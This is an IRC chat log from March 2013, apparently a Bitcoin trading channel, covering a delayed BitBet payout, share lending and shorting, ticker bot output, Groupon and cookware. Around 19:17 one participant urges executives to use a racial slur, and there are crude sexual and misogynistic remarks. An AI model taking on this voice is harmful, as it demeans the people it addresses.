Mar 01 16:19:53 Still no love on that bet here mircea_popescu Mar 01 16:21:07 Zillion dun' worry, it'll be paid before bfl ships :) Mar 01 16:21:16 [BTCTC] [ESECURITYSABTC] 4 @ 0.63899 = 2.556 BTC [-] Mar 01 16:21:43 LOL yeah but I am not the tycoon as you and need my measly coins Mar 01 16:22:11 BFL did not ship. Confirmed? Mar 01 16:22:26 cooonfirmed Mar 01 16:22:34 checking one sec Mar 01 16:22:41 Zillion srsly, we ran into some sendmany hairs, working at it, it will not be long. Mar 01 16:23:13 np just wanting to be sure no wallet problems is all really Mar 01 16:23:25 you can be sure of that. Mar 01 16:24:24 thank ya sir...sorry, patience never been a strong suit for me Mar 01 16:24:41 np np Mar 01 16:25:49 i think it would be awesome if we could lend our shares out on mpex...with an escrow feature of some sort Mar 01 16:26:56 why would you do that? Mar 01 16:27:12 very new to all this if that is a dumb question Mar 01 16:27:14 so others could short Mar 01 16:27:27 mjr_ and why can' you ?! Mar 01 16:27:32 and i could have my shares which are just sitting there earn extra income Mar 01 16:27:35 while ive never used btcjam, i like how the integrated using btct assets as collateral Mar 01 16:27:39 you COULD, but there is no escrow Mar 01 16:27:40 i see what you mean\ Mar 01 16:27:41 jurov: why do you expect that? Mar 01 16:27:42 they* Mar 01 16:27:50 risk averse Mar 01 16:28:04 thestringpuller, cause mp mentioned sendmany hairs Mar 01 16:28:17 sendmany hairs? Mar 01 16:28:33 mjr__: smickles is working on something for that purpose I thik Mar 01 16:28:35 think* Mar 01 16:29:06 mjr__, shorting is by definition incompatible with simple escrow Mar 01 16:29:18 mircea_popescu: I would rather have my shares in a pool for lending with the understanding that the guy has to have assets to back it up. Similar to bitfinex's system Mar 01 16:30:00 mjr_ you can find an escrow you trust, push to them. Mar 01 16:30:07 but instead of BTC or USD, S.DICE and S.MPOE Mar 01 16:30:11 unlike the bitfinex system w./e that is, you actually have signed receipts to prove this on mpex. Mar 01 16:30:21 what's the impediment ? Mar 01 16:30:29 yes true Mar 01 16:30:53 im sure any of the pt ops would do this, for instance. Mar 01 16:30:58 possibly for a fee tho Mar 01 16:31:45 lol jurov Mar 01 16:31:50 i understood mjr__ looks for a broker he'll just push the shares to and broker does the legwork Mar 01 16:32:10 this may be a decent line of business Mar 01 16:32:13 at least it is irl Mar 01 16:32:16 locating shortable blocks Mar 01 16:32:41 jurov you should add a shorting pool Mar 01 16:32:53 set up some interest rates, you already have one donor :P Mar 01 16:33:50 i meant a more automated system, yes Jurov and collects a portion of the interest or fees i generate Mar 01 16:34:15 there's no reason it can't be automated, for sure. Mar 01 16:34:15 ie. i can just leave my shares in that pool, but i specificy that my term will expire before dividends Mar 01 16:34:30 actually iirc topace was working on some automation for crediting pushes to his PT Mar 01 16:34:34 even better win, if they win the bet, i can double down Mar 01 16:34:35 this probably can be reused Mar 01 16:34:42 true Mar 01 16:35:16 my whole point is that i want to increase my long position, but i don't want to buy at market, so if people want to sell at market, and then have to cover, i can buy back my own shares Mar 01 16:35:34 [MPEX] [S.MPOE] 2200 @ 0.00075632 = 1.6639 BTC [+] Mar 01 16:36:04 if they are right and the short position works, i can increase my position for cheaper, if they are wrong, i get my original shares back anyway, and still rely on dividends Mar 01 16:36:07 i'd prefer to run it closed with fixed interest, without dosclosing when i or someone other shorted and how much. Mar 01 16:36:44 exactly, i don't care who they are, i would rather trust mpex or coinbr than an individual person, provided that there is an autoclose out feature and there account is liquid enough to be able to buy back Mar 01 16:36:47 transparency leads to somilar things like MPBPT investors bitching that i endangered their investment by setting the rate too high, lol Mar 01 16:36:51 some risk monitoring system Mar 01 16:37:16 lmao maybe i can adapt bitcoinica code Mar 01 16:37:25 lol listen Mar 01 16:37:37 paying a fixed fee per week makes sense Mar 01 16:37:39 0.1% or w/e Mar 01 16:38:03 and dividends pass through to original owner Mar 01 16:38:55 yes that side is clear... but on the other side, maybe i can lend out to coinbr users where i can force liquidate them (hence bitcoinica reference) Mar 01 16:39:03 :p Mar 01 16:39:29 i dont mind being force liquidated as long as you give it a cute nickname like "starfished" or "juroved" Mar 01 16:39:31 anyway, certainly a valid development direction, this. Mar 01 16:39:38 juroved works. Mar 01 16:39:44 like brejnev'd except worse Mar 01 16:40:35 yes exactly, i don't want to rely on trusting them to return shares and be solvent Mar 01 16:40:54 if their account approaches insolvency they should get a margin call Mar 01 16:41:11 and if it reaches the point where they would be insolvent, they should be autoliquidated Mar 01 16:41:58 okay, will plan it. but that even increases the risk of orders mismatch... mircea, how far are you with full tracking? did you determine it can be done? Mar 01 16:42:33 who isn't following this - the "track" feature works basically only on half of transactions Mar 01 16:44:08 the other half shows digest of other user's order Mar 01 16:45:21 are these connected somehow ? Mar 01 16:45:41 yay Mar 01 16:45:45 bitbet payment recvd Mar 01 16:45:46 if i mismatch leveraged orders the mess will be bigger Mar 01 16:45:51 brb Mar 01 16:46:11 Zillion there you go. Mar 01 16:46:29 sorry for the delay everyone. bitcoind is not yet exactly mature, needs a little expert oiling Mar 01 16:46:40 ah, good idea too, if you were to allow me to lend my btc out for margin on people it could work in the same system...but again, need very robust risk controls Mar 01 16:46:44 thats a BTC short for me??? Mar 01 16:46:57 it is ?! Mar 01 16:47:03 yes sir Mar 01 16:47:11 which line we talking about ? Mar 01 16:47:58 weight 37`870 Mar 01 16:48:05 2 btc Mar 01 16:48:23 you sent me 1.99 Mar 01 16:48:45 1.98876913 Mar 01 16:49:00 um looking into this Mar 01 16:49:09 thank you Mar 01 16:49:25 you mean 21-02-13 19:54 No 357 2.00000000 19PN8 1.98876913 1Bye9 ? Mar 01 16:51:26 holy crap you are so right sir Mar 01 16:51:38 how did i screw that up Mar 01 16:51:41 sorry man Mar 01 16:52:01 jurov : http://blockchain.info/tx-index/57549707/fead082c83a0625eb8cc22452b7f213d7be041e29a7d2c203e704b01ec6bb04b Mar 01 16:52:06 check that out, 3.5kb tx :D Mar 01 16:52:12 Zillion np np Mar 01 16:52:17 nothing like whining just to find out your wrong and last money :) Mar 01 16:52:33 gotta be careful with the weights Mar 01 16:52:36 becauyse site rtakes 1% Mar 01 16:52:45 i was up too late Mar 01 16:52:48 so if odds are even and weight under 1k (out of the orig 100k) you may end up - Mar 01 16:53:07 i know the deal sir Mar 01 16:53:48 http://blockchain.info/tx-index/57549811/c6258eff0639d758015ed5dcdd8a1f1dcf7580ac833d52336b6ec4469f9281b5 and a 2.8kb tx with 0 fees ahaha Mar 01 16:54:10 this bitbet stuff is informative. Mar 01 16:58:44 [BTCTC] [BTC-BOND] 500 @ 0.01 = 5 BTC [+] Mar 01 16:59:59 http://www.globalpost.com/dispatches/globalpost-blogs/the-grid/bitcoin-virtual-currency-legitimacy-online-retailers Mar 01 17:01:04 i am curious if you could use blockchain analysis to get an accurate NPV of S.DICE dividends Mar 01 17:01:25 at the very least gross profit Mar 01 17:01:25 people already do on the forum no ? Mar 01 17:01:27 Zillion: I got my bitbet return Mar 01 17:01:33 haven't seen that yet Mar 01 17:02:06 dooglus' stuff, no ? Mar 01 17:04:29 maybe the default end weight should be 1000 to account for this Mar 01 17:04:36 not 1 Mar 01 17:04:59 jurov what about a bet like http://bitbet.us/bet/2/s-mpoe-will-crash-this-spring/ Mar 01 17:05:09 that's 100:1. end weight of even 11 makes you money. Mar 01 17:05:46 mhm Mar 01 17:10:46 so these bets with, so and so will happen by 4/1/2013, are they over if that something happpens on 3/5/3013? Mar 01 17:10:55 or do they just sit there until the end to pay out? Mar 01 17:16:16 do you do underwriting mircea? Mar 01 17:16:25 at this point i mean Mar 01 17:16:29 or do you just list Mar 01 17:16:55 i wanna get into the private equity game lol Mar 01 17:19:03 !ticker S.MPOE Mar 01 17:19:04 How can I be of assistance, my poor man? Mar 01 17:19:09 !ticker m S.MPOE Mar 01 17:19:10 [MPEX:S.MPOE] 1D: 0.0007147 / 0.00075259 / 0.00076 (207052 shares, 155.83 BTC), 7D: 0.00061614 / 0.00069755 / 0.00078 (17890704 shares, 12,479.69 BTC), 30D: 0.0006153 / 0.00067287 / 0.00078 (67719739 shares, 45,566.99 BTC) Mar 01 17:19:22 horsemeat found in tacobell Mar 01 17:19:26 heh Mar 01 17:20:07 mircea_popescu: how bout this guy? Mar 01 17:20:08 !ticker h sdice Mar 01 17:20:10 [HAVELOCK:SDICE] 1D: 0.64000000 / 0.65926621 / 0.68950000 (139 shares, 91.63800308 BTC), 7D: 0.60000000 / 0.65115724 / 0.69400000 (1192 shares, 776.17942766 BTC), 30D: 0.52100000 / 0.66313431 / 0.89000000 (11178 shares, 7412.51528089 BTC) Mar 01 17:20:13 http://bitbet.us/bet/153/s-mpoe-will-rise-this-spring/ Mar 01 17:20:35 that doesn't seem to get as much love for some reason Mar 01 17:20:51 it Mar 01 17:20:53 i would think horsemeat would cost more than cornfed cow meat Mar 01 17:20:59 mjr__ i do a mix of both Mar 01 17:21:01 's too much of a futures bet Mar 01 17:21:11 June is a far away mr. popescu Mar 01 17:21:26 blu3gr1f1on in general they're over Mar 01 17:21:32 depends on the exact circumstances tho Mar 01 17:21:53 horse meat is cheap if it comes from a horse no one wants Mar 01 17:22:01 mircea, how do I find that article you wrote on the bonds Mar 01 17:22:06 mmm satoshi's daemon Mar 01 17:22:52 race horses are dog food Mar 01 17:23:11 meateater problems Mar 01 17:23:37 not a problem Mar 01 17:24:08 not in any meangingful sense, no it isnt Mar 01 17:24:19 but sure has a lot of people chatting Mar 01 17:24:40 i like horse Mar 01 17:25:23 thestringpuller which one ? Mar 01 17:27:19 what i don't understand is that they eat horse meat when it's labeled horse Mar 01 17:27:32 i really wouldn't care if i found out i ate pork when i thought it was only beef Mar 01 17:27:40 big deal Mar 01 17:27:51 if within a few weeks’ time you find yourself in the position of having to decide whether a few million dollars go to a. free drinks and garter inserts at a number of strip clubs or to b. coinbase “second round of funding”, the correct business decision is certainly a. At least the strippers can actually provide an answer should anyone happen to ask “what the fuck are you doing”. <<< I think many VC's w Mar 01 17:28:34 in the US, mostly the only meat-switching news you hear about is with fish Mar 01 17:28:38 mircea_popescu: I found the one I was looking for. Mar 01 17:28:45 cheap fish being sold as expensive fish in restaurants Mar 01 17:29:14 a kk Mar 01 17:30:15 mircea_popescu: I was looking for http://trilema.com/2012/mpoe-bonds-historical-data/ btw Mar 01 17:30:38 mircea_popescu is the string puller!!! Mar 01 17:30:41 now i know everything Mar 01 17:30:48 (btw thats is actually true) Mar 01 17:31:08 gz on ur success Mar 01 17:31:22 um wut Mar 01 17:34:54 ;;calc 344 + 364 + 6074 + -632 Mar 01 17:34:54 6150 Mar 01 17:35:04 MPBOR is in the overall green Mar 01 17:35:37 nominal green* congrats mr. popescu! Mar 01 17:36:04 it's like the pirate month never happened... Mar 01 17:36:18 yeh Mar 01 17:36:20 cool Mar 01 17:40:38 jurov here's the rand you promised http://trilema.com/2013/bitcoind-not-quite-ready-for-prime-time/ Mar 01 17:40:48 i started off trying to be nice but by the end i was thoroughly pissed off so. Mar 01 17:43:46 1 BTC = 34.25001 U.S. dollars = 26.2693741 Euros Mar 01 17:44:25 fucking xchat Mar 01 17:44:35 hey now Mar 01 17:45:54 so you underwrite and marketmake? Mar 01 17:48:12 mircea Mar 01 17:50:47 EskimoBob tell me about the things that make you angry Mar 01 17:51:13 i figured you were angry about something Mar 01 17:51:32 you normally seem angry Mar 01 17:51:50 I imagine you having steam coming from your ears Mar 01 17:51:55 mjr__ to some degree. the way it practically works is mostly by putting min bids in during ipos Mar 01 17:51:58 like a cartoon Mar 01 17:52:07 i really do Mar 01 17:52:10 nothing much came of it in the case of bitbet for instance, it took off way Mar 01 17:55:04 is g.bbet on bitfunder bitbet.us? Mar 01 17:55:13 yes Mar 01 17:55:25 BitHub: danke Mar 01 17:55:32 no problem Mar 01 17:55:47 !ticker m s.dice Mar 01 17:55:48 [MPEX:S.DICE] 1D: 0.00610821 / 0.00633093 / 0.00637777 (46523 shares, 294.53 BTC), 7D: 0.00572194 / 0.00621997 / 0.00638999 (320933 shares, 1,996.19 BTC), 30D: 0.0042 / 0.00602873 / 0.007395 (6844333 shares, 41,262.64 BTC) Mar 01 17:56:14 !ticker h sdice Mar 01 17:56:15 [HAVELOCK:SDICE] 1D: 0.64000000 / 0.65926621 / 0.68950000 (139 shares, 91.63800308 BTC), 7D: 0.60000000 / 0.65115724 / 0.69400000 (1192 shares, 776.17942766 BTC), 30D: 0.52100000 / 0.66313431 / 0.89000000 (11178 shares, 7412.51528089 BTC) Mar 01 17:57:00 blu3gr1ffon - https://bitfunder.com/asset/G.BBET Mar 01 17:57:28 1 BTC = 34.49900 U.S. dollars = 26.4603467 Euros Mar 01 17:58:03 any hope for ziggap? Mar 01 17:58:22 who are those ? Mar 01 17:58:33 ziggap are on bitfunder as well Mar 01 17:59:10 they are, newly so. anybody used the service? Mar 01 17:59:26 "Anonymous Mar 01 17:59:26 I am done using this site. When you place a bet with a professional you want to be paid when the bet has resolved. Not when someone is good and ready to pay you. Mircea Popescu is a no better than any scammer before him." Mar 01 17:59:26 [BTCTC] [BASIC-MINING] 2 @ 0.35 = 0.7 BTC [+] Mar 01 17:59:31 wtf is wrong with people srsly! Mar 01 17:59:47 PAY ME NAO Mar 01 17:59:57 yes blue i have Mar 01 18:00:03 its a place to buy bitcoins from Mar 01 18:00:06 they do a few countries Mar 01 18:00:36 ThickAsThieves ok but i mean... today is still the 1st wtf. Mar 01 18:00:46 for realz Mar 01 18:00:50 banks regularly hold payments 2-3 days, what about that. Mar 01 18:01:31 i guess people expect the perks of bitcoin to apply to bitbet Mar 01 18:01:33 guaranteed that person will bet agai Mar 01 18:01:34 n Mar 01 18:01:35 stuff has to be checked, for one, it's not exactly pennies we're dealing here. stuff breaks half the time, as it was indeed the case this time. new code and all that. Mar 01 18:01:38 he will Mar 01 18:01:43 gotta give scammers like mircea_popescu some slack eh. Mar 01 18:02:12 ThickAsThieves yea prolly. Mar 01 18:02:22 he probly had some other bet or debt he needed to fill Mar 01 18:03:00 i guess if you sit there and mash the f5 there's little difference between an hour and all eternity Mar 01 18:03:06 who knows, maybe bad experiences. Mar 01 18:03:06 [HAVELOCK] [SDICE] 3 @ 0.68 = 2.04 BTC [-] Mar 01 18:03:38 who's the sack of shit now? Mar 01 18:03:43 ugh why did i ask... Mar 01 18:05:06 [HAVELOCK] [SDICE] 9 @ 0.685 = 6.165 BTC [+] Mar 01 18:05:21 1 BTC = 34.49489 U.S. dollars = 26.4571944 Euros Mar 01 18:05:25 aww you guys didnt like my TV bets? Mar 01 18:05:46 [MPEX] [S.DICE] 5000 @ 0.00637776 = 31.8888 BTC [+] Mar 01 18:07:06 [HAVELOCK] [SDICE] 38 @ 0.64500001 = 24.51 BTC [-] Mar 01 18:07:07 [HAVELOCK] [SDICE] 10 @ 0.645 = 6.45 BTC [-] Mar 01 18:07:09 [HAVELOCK] [SDICE] 2 @ 0.635 = 1.27 BTC [-] Mar 01 18:09:45 ;;ticker Mar 01 18:09:46 BTCUSD ticker | Best bid: 34.49501, Best ask: 34.50000, Bid-ask spread: 0.00499, Last trade: 34.50000, 24 hour volume: 63944.06343327, 24 hour low: 30.90200, 24 hour high: 34.51541, 24 hour vwap: 33.24964 Mar 01 18:09:56 ;;calc 1689.81 * 33.25 Mar 01 18:09:57 56186.1825 Mar 01 18:10:05 bitbet is like vegas nao Mar 01 18:10:41 you can get hooker sthere? Mar 01 18:10:44 or what? Mar 01 18:11:14 i see my bet Mar 01 18:11:21 you were this close to a scammer tag Mar 01 18:11:45 i like the Survivor bet better though Mar 01 18:11:55 https://blockchain.info/tx/36d2d306bf3798b9e3730239f58095cd7baeea5963cb9bcc736b6aa20b0b90c5?show_adv=true Mar 01 18:11:57 15kb tx, no fee Mar 01 18:12:02 this is afaik the record Mar 01 18:13:19 you get the btc-pincher award Mar 01 18:14:03 oldest coinbase award moar like it Mar 01 18:18:30 ;;ticker Mar 01 18:18:31 BTCUSD ticker | Best bid: 34.60000, Best ask: 34.83988, Bid-ask spread: 0.23988, Last trade: 34.83990, 24 hour volume: 65618.15625339, 24 hour low: 30.90200, 24 hour high: 34.83990, 24 hour vwap: 33.28810 Mar 01 18:18:43 ;;ticker Mar 01 18:18:43 BTCUSD ticker | Best bid: 34.60000, Best ask: 34.75000, Bid-ask spread: 0.15000, Last trade: 34.83990, 24 hour volume: 65618.15625339, 24 hour low: 30.90200, 24 hour high: 34.83990, 24 hour vwap: 33.28810 Mar 01 18:18:49 oops Mar 01 18:19:04 the ;; is def easier than the & sadly Mar 01 18:19:10 echo:) Mar 01 18:24:33 Isn't Google Glass already scheduled to ship in 2013? Mar 01 18:24:54 which was accelerated from when they said 2014 last year Mar 01 18:25:47 btw it's called Google Glass Mar 01 18:25:52 not Google Glasses Mar 01 18:30:45 [MPEX] [S.MPOE] 4000 @ 0.00075999 = 3.04 BTC [+] Mar 01 18:31:45 TAKE MY MONEY !! Mar 01 18:31:52 google glass ftw Mar 01 18:37:45 yeah i need google glass Mar 01 18:37:50 the new video was awesome Mar 01 18:37:59 and i saw a picture of sergey brin on the subway in nyc wearing them Mar 01 18:38:48 from the looks of their promo photos, you have to look pretty hip to own a pair Mar 01 18:41:24 bulllls on parade! Mar 01 18:42:22 strong move Mar 01 18:42:24 !!! Mar 01 18:42:42 here comes 35 Mar 01 18:43:02 no one ever went broke taking profits...sell sell sell Mar 01 18:43:21 i sold a bit today Mar 01 18:43:39 http://www.bloomberg.com/news/2013-03-01/consumer-spending-in-u-s-climbs-even-as-taxes-hurt-incomes.html Mar 01 18:43:58 "Consumer spending in the U.S. rose in January even as incomes dropped by the most in 20 years, showing households were weathering the payroll-tax increase by socking away less money in the bank." Mar 01 18:44:04 these people were already not saving enough. Mar 01 18:44:14 i was saying that as i kept my finger on the buy button, following goldman sach's modus operandi...tell people to do the exact opposite of what you plan on doing, and have them pay you for the "service" Mar 01 18:44:15 the vote is in : the us public does not care whether the us ends. Mar 01 18:44:49 yes, but it is the system that makes savers into suckers Mar 01 18:45:18 i honestly think it may even be a partly subconscious effect whereby without concsciously realizing it, you know that saving is stupid when the value goes down so rapidly Mar 01 18:45:35 QE infinity and beyond Mar 01 18:45:59 right. Mar 01 18:46:05 mp. america is fucked Mar 01 18:47:44 americans are so ignorant and detached from the political and financial world it isnt funny Mar 01 18:47:54 they have no clue Mar 01 18:48:11 i can have an intelligent conversation with maybe 5% of the people i come across Mar 01 18:48:18 their parents or grandparents made all the money, now everyone has credit Mar 01 18:48:25 actually seeing how the expenditure is in large part houses, Mar 01 18:48:38 it's pretty smart. buy a house today for 100k of debt, wait for obama to make 100k = 1 pizza Mar 01 18:48:43 then pay back, get free house. Mar 01 18:49:08 i like that plan Mar 01 18:49:11 but that is the point Mar 01 18:49:14 they even messed up real estate as investment for the middle and lower class Mar 01 18:49:15 debt is good Mar 01 18:49:16 ThickAsThieves that's not limited to the us you know Mar 01 18:49:24 and they want eveeryone in as much debt as possible Mar 01 18:49:34 i dont know really :) Mar 01 18:49:41 i try to be worldly Mar 01 18:49:44 but i know i'm not Mar 01 18:50:05 i follow BBC and some Al Jazeera news Mar 01 18:50:09 but not much more than that Mar 01 18:50:42 and even that is WAY more than most people i know Mar 01 18:50:45 i could carry on an intelligent conversation with maybe 5% of the egyptians in either cairo or luxor Mar 01 18:50:49 turks in istanbul Mar 01 18:50:56 russians in sevastopol Mar 01 18:50:58 you name it Mar 01 18:51:16 i dont really understand why so many people dont want to think for themselves Mar 01 18:51:25 dont Mar 01 18:54:03 the jools of twitter : Mar 01 18:54:19 @MarkCalabria Mar 01 18:54:19 Will be moderating panel here at Cato, March 13. Would a Financial Transaction Tax Affect Financial Market Activity? http://www.cato.org/events Mar 01 18:54:24 @MarkCalabria Only in the sense that finance will move to Bitcoin faster. Mar 01 18:54:29 @Mircea_Popescu Does the EU transaction tax proposal apply to Bitcoin transactions? Mar 01 18:54:33 @MarkCalabria No, Bitcoin is structurally immune to imposed taxation. Mar 01 18:54:36 le win. Mar 01 18:55:38 nice Mar 01 18:56:52 ;;ticker Mar 01 18:56:53 BTCUSD ticker | Best bid: 34.53318, Best ask: 34.79987, Bid-ask spread: 0.26669, Last trade: 34.80000, 24 hour volume: 67402.19246156, 24 hour low: 30.90200, 24 hour high: 34.83990, 24 hour vwap: 33.33373 Mar 01 18:57:37 http://polimedia.us/dtng/c/src/136209288816.jpg did i mention i love those pants ? Mar 01 18:59:36 is that horse or cow leather? Mar 01 19:00:27 it's prolly mare leather substituted for heifer. Mar 01 19:01:06 [HAVELOCK] [SDICE] 1 @ 0.68499999 BTC [+] Mar 01 19:01:13 scams Mar 01 19:03:34 this coinlab ticker, Mar 01 19:03:40 shows negative time since Mar 01 19:03:42 someitmes Mar 01 19:03:52 they are time travelers Mar 01 19:04:01 -11s ago Mar 01 19:04:03 [MPEX] [S.MPOE] 6800 @ 0.00075632 = 5.143 BTC [-] Mar 01 19:04:05 [MPEX] [S.MPOE] 4927 @ 0.00075542 = 3.722 BTC [-] Mar 01 19:04:06 [MPEX] [S.MPOE] 5478 @ 0.00075 = 4.1085 BTC [-] Mar 01 19:07:58 Spiers, responding to a question about whether he regretted Groupon going public with "I feel like the only reason you could be asking me that question is because you think I’m stupid or because you’re trying to see if I’m going to lie to you." Mar 01 19:08:15 speaking of pants: http://www.youtube.com/watch?v=8l3nCqOWua4 Mar 01 19:08:23 lol Mar 01 19:08:29 http://www.fastcompany.com/3006439/where-are-they-now/exclusive-andrew-masons-last-interview-groupon-ceo Mar 01 19:08:34 he blew his plural. reasonS. Mar 01 19:08:53 and for the record i totally called this on trilema, when they ipod Mar 01 19:09:43 i had every client asking me about groupon for a while Mar 01 19:09:46 i was like NO Mar 01 19:09:52 are you dumb?! Mar 01 19:13:16 investing, heh. Mar 01 19:13:39 oh, i meant as an mktg solution Mar 01 19:14:01 "We sat in the dining room at Madera, a Michelin 1-star rated restaurant in the Rosewood, a luxury hotel that’s partly owned by Stanford University." Mar 01 19:14:06 lol 1 star better than no star! Mar 01 19:14:11 why do us restaurants suck so bad. Mar 01 19:14:39 i think michelin stars work diff than hotel ratings Mar 01 19:14:54 i dont think you can get 5 Mar 01 19:15:18 up to 3 Mar 01 19:15:33 yes. Mar 01 19:16:01 ;;ticker Mar 01 19:16:02 BTCUSD ticker | Best bid: 34.75002, Best ask: 34.81892, Bid-ask spread: 0.06890, Last trade: 34.81895, 24 hour volume: 68172.45866000, 24 hour low: 30.90200, 24 hour high: 34.83990, 24 hour vwap: 33.35396 Mar 01 19:16:33 He softened a bit. “I think in the first phase of our company, we were a glorified mailing list. We had a completely unintelligent email that we sent out once a day and we had a human sales force that was going around and procuring the deals... " Mar 01 19:16:35 ahahaha o god. Mar 01 19:16:44 why don't they say this sort of shit in autumn 2011 ? Mar 01 19:16:53 why do they wait for it to be 2013 and everyone be pissed off ? Mar 01 19:17:06 this is what so called CEOs should learn from me, seriously. say it dude. Mar 01 19:17:33 what is the lesson, i'm listening Mar 01 19:17:34 say nigger. tell people to fuck off. say your company sucks and is a glorified mailing list. say whatever the hell is the case. Mar 01 19:17:54 no matter how apparently impolite, impolitical, inappropriate or whatever the fuck. Mar 01 19:17:57 just say it. Mar 01 19:17:58 i'm a big proponent of telling the truth Mar 01 19:18:09 truth has nothing to do with it. Mar 01 19:18:15 if you have shareholders, it is illegal to do anything that would lower the price of your company Mar 01 19:18:16 any company that is largely a sales team sucks Mar 01 19:18:20 blu3gr1f1on fuck that. Mar 01 19:18:30 ThickAsThieves coca cola is largely a sales team. Mar 01 19:18:39 it can be done, marginally. Mar 01 19:18:41 new ATH Mar 01 19:18:54 exception to prove the rule? Mar 01 19:18:54 mircea_popescu believes in falsifying histroy Mar 01 19:18:58 history* Mar 01 19:19:04 i do "? Mar 01 19:19:31 How much of the full story does anyone person know? Mar 01 19:19:40 that's exactly the motherfucking point. Mar 01 19:19:45 say it. it doesn't have to be "the truth" Mar 01 19:19:49 it just has to be what you see. Mar 01 19:19:58 Or what you want everyone else to see. Mar 01 19:20:11 that only sets you up for the unpleasant situation of this guy Mar 01 19:20:15 http://www.fastcompany.com/3006439/where-are-they-now/exclusive-andrew-masons-last-interview-groupon-ceo Mar 01 19:20:23 sorry i was distracted by imgur and now I'm watching this: https://www.youtube.com/watch?v=RtS2Ikk7A9I Mar 01 19:20:24 you're better off ignoring what people want entirely. Mar 01 19:20:28 what were we talking about Mar 01 19:20:34 jcpham buttseks Mar 01 19:20:48 i do not like this topic Mar 01 19:20:55 aha! thats why the bot shorted them. Poor guy. Mar 01 19:21:54 ;;ticker Mar 01 19:21:55 BTCUSD ticker | Best bid: 34.81100, Best ask: 34.86999, Bid-ask spread: 0.05899, Last trade: 34.81100, 24 hour volume: 68642.46395107, 24 hour low: 30.90200, 24 hour high: 34.89000, 24 hour vwap: 33.36688 Mar 01 19:22:18 wtf is a groupon anyways Mar 01 19:22:28 a glorified mailing list. literally. Mar 01 19:22:28 jcpham: seriously? Mar 01 19:22:32 mircea_popescu: no Mar 01 19:22:33 didn't they go out of business Mar 01 19:22:33 lol at this video Mar 01 19:22:36 its basically a volume discount Mar 01 19:22:51 well i do not shop so idgaf Mar 01 19:22:53 a lot of people collectively take up a discount Mar 01 19:22:59 jcpham: not just items, services too Mar 01 19:23:16 broup buy coupons Mar 01 19:23:18 i get it Mar 01 19:23:24 a lot of companies pulled out of groupon and refuses to honor groupon deals because groupon wouldn't set limits and shit Mar 01 19:23:30 i see Mar 01 19:23:38 group on also had pretty fucked up internal financials Mar 01 19:23:56 groupon promotes consumerism Mar 01 19:24:02 Diablo-D3 which is a polite way of saying they cooked the books for the ipo Mar 01 19:24:03 i'm violently anti-consumer Mar 01 19:24:10 it has a high carbon footprint Mar 01 19:24:27 mircea_popescu: basically Mar 01 19:24:39 jcpham: consumerism isn't bad inherently Mar 01 19:24:55 jcpham: like, I'll buy mass produced products…. they just have to be high quality ones Mar 01 19:25:04 when people band together in facebook hoardes to groupon their rent money? Mar 01 19:25:06 like I just bought a $99 9" frying pan Mar 01 19:25:26 why the fuck would you pay 100$ for a pan Mar 01 19:25:35 its an all copper frying pan with a thin layer of 18/10 stainless steel for the cooking surface Mar 01 19:25:38 i barely eat let alone spend money on retarded kitchen goods Mar 01 19:25:39 they normally go for $200+ Mar 01 19:25:45 a good pre-seasoned cast-iron skillet? Mar 01 19:25:47 I took advantage of a pricing error Mar 01 19:25:54 pigeons: a good one of those is $20 =P Mar 01 19:25:56 fuck yeah lodge Mar 01 19:25:57 pigeons that's a hand me down Mar 01 19:26:04 can't beat lodge cast iron Mar 01 19:26:12 jcpham: its like this Mar 01 19:26:14 yeah that's what i have ;> Mar 01 19:26:15 grandma hooked us up with the cast iron Mar 01 19:26:19 Im going to own one frying pan the rest of my life thats not cast iron Mar 01 19:26:23 so why not buy the best? Mar 01 19:26:33 pigeons i have some cast iron stuff. the problem with it is the womenz can barely lift the stuff. some sauces require lifting the pot with one hand while stirring with the other Mar 01 19:26:49 mircea_popescu: yeah, I wouldn't use cast iron for sauces Mar 01 19:26:51 i'm just poking at you Diablo-D3, if you want to spend money on copper pans and mine bitcoins on Nvidia Mar 01 19:26:51 you use it for meats Mar 01 19:26:52 need stronger womerns Mar 01 19:26:53 be my guest Mar 01 19:27:12 mircea_popescu: get a 18/10 stainless pot Mar 01 19:27:15 they're light and inexpensive Mar 01 19:27:16 pigeons you fuck 24 inch bicep amazon pikewomen k ? Mar 01 19:27:25 you can get one for like $50-75 depending on what size Mar 01 19:27:35 ;;google pikewoman Mar 01 19:27:35 Pepper Pike woman driving force behind Arts Summit in Cleveland ...: ; Pepper Pike woman overcomes multiple sclerosis and publishes ...: ; Northern Pike - Woman River Camp: (1 more message) Mar 01 19:27:36 you guys know too much about cooking stuff Mar 01 19:27:38 ;;ticker Mar 01 19:27:39 BTCUSD ticker | Best bid: 34.89769, Best ask: 34.89989, Bid-ask spread: 0.00220, Last trade: 34.89990, 24 hour volume: 68050.93419775, 24 hour low: 30.90200, 24 hour high: 34.89990, 24 hour vwap: 33.36805 Mar 01 19:27:44 Chaang-Noi: cooking is a man's art Mar 01 19:27:44 not pikewomen, just healthy Mar 01 19:27:47 to 42 Mar 01 19:27:53 Diablo-D3 often enough you make the sauce in the same skillet you cooked the meat for juice economy. Mar 01 19:28:02 mircea_popescu: it depends on the sauce Mar 01 19:28:05 [MPEX] [S.DICE] 100 @ 0.00637776 = 0.6378 BTC [+] Mar 01 19:28:06 ofcourse Mar 01 19:28:12 mircea_popescu: like, I don't ike putting tomatoes in a cast iron pan Mar 01 19:28:19 no acids. Mar 01 19:28:19 or other acidic foods Mar 01 19:28:31 but a white sauce or gravy? thats fine Mar 01 19:28:33 i can honestly say I'm never experienced the word juice followed by the word economy Mar 01 19:28:34 exactly. Mar 01 19:28:52 i think i should take a nap or bleed out or something Mar 01 19:28:53 jcpham you never lived having to save your juice to satisfy many hungry mouths either. Mar 01 19:28:56 jcpham: he basically said "gravy without getting another pan dirty" Mar 01 19:29:02 mircea_popescu: HAH Mar 01 19:29:16 good one huh. Mar 01 19:29:21 I laughed out loud, Im a bad person. No wait, that other thing, Im awesome. Mar 01 19:29:36 i can't wait to drop "juice economy" on someone Mar 01 19:29:41 when they least expect it Mar 01 19:29:53 then make them pay you bitcoin dust for it. Mar 01 19:30:03 but yeah, I wouldn't have paid $200 for this Mar 01 19:30:08 infact, I didn't even want to pay $100 Mar 01 19:30:12 7 bitcoin, who cares. Mar 01 19:30:13 I was aiming for the $50s Mar 01 19:30:18 but when something like that comes up Mar 01 19:30:19 you snag it Mar 01 19:30:41 $100 for a pan? Mar 01 19:30:48 why it is good again? Mar 01 19:31:06 other than not being cast iron? Mar 01 19:31:16 copper is good cause very conductive Mar 01 19:31:25 medical steel coating cause resistant and healthy Mar 01 19:31:33 (unlike teflon and crap) Mar 01 19:31:56 what do they make woks out of? Mar 